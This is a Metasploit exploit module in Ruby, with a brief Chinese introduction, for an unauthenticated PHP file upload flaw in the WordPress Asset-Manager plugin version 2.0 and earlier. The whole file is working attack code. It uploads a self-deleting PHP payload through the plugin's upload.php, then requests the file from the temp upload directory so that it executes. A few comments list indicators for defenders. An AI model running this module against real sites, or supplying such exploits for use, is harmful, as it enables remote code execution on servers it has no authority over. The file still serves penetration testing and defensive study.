这个模块利用的是 Metasploit 漏洞库中收录的、在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许上传 PHP 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
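# Framework core plus the PhpEXE mixin (get_write_exec_payload) used by the module below.
require 'msf/core'
require 'msf/core/exploit/php_exe'
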
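class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Declares module metadata (name, references, targets) and the TARGETURI option.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'        =>
        {
          # NUL is excluded from the bytes the payload generator may emit.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads the PHP payload through the plugin's upload.php (no credentials are
  # sent) and then requests the stored file from the plugin's temp directory so
  # the web server executes it.
  #
  # Both steps are ordinary HTTP requests below TARGETURI:
  #   POST wp-content/plugins/asset-manager/upload.php   (multipart field "Filedata")
  #   GET  wp-content/uploads/assets/temp/<random>.php
  # For defenders, unauthenticated POSTs to that upload.php and new .php files
  # appearing under uploads/assets/temp/ are the observable indicators.
  #
  # Aborts via fail_with(Exploit::Failure::UnexpectedReply) when the upload
  # response is missing, not 200, or does not contain the uploaded filename, or
  # when the trigger request returns a non-200 response.
  def exploit
    uri = target_uri.path
    uri << '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # Self-deleting dropper so the uploaded file does not linger after it runs.
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Drop the CRLF that precedes the first "--_Part_" boundary in the serialized body.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })
    # Success is judged by a 200 whose body contains the uploaded filename
    # (plain substring check; payload_name is alphanumeric plus ".php").
    unless res && res.code == 200 && res.body.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })
    # A nil response is tolerated here (presumably the executing payload may not
    # return a normal HTTP reply); only an explicit non-200 status is a failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end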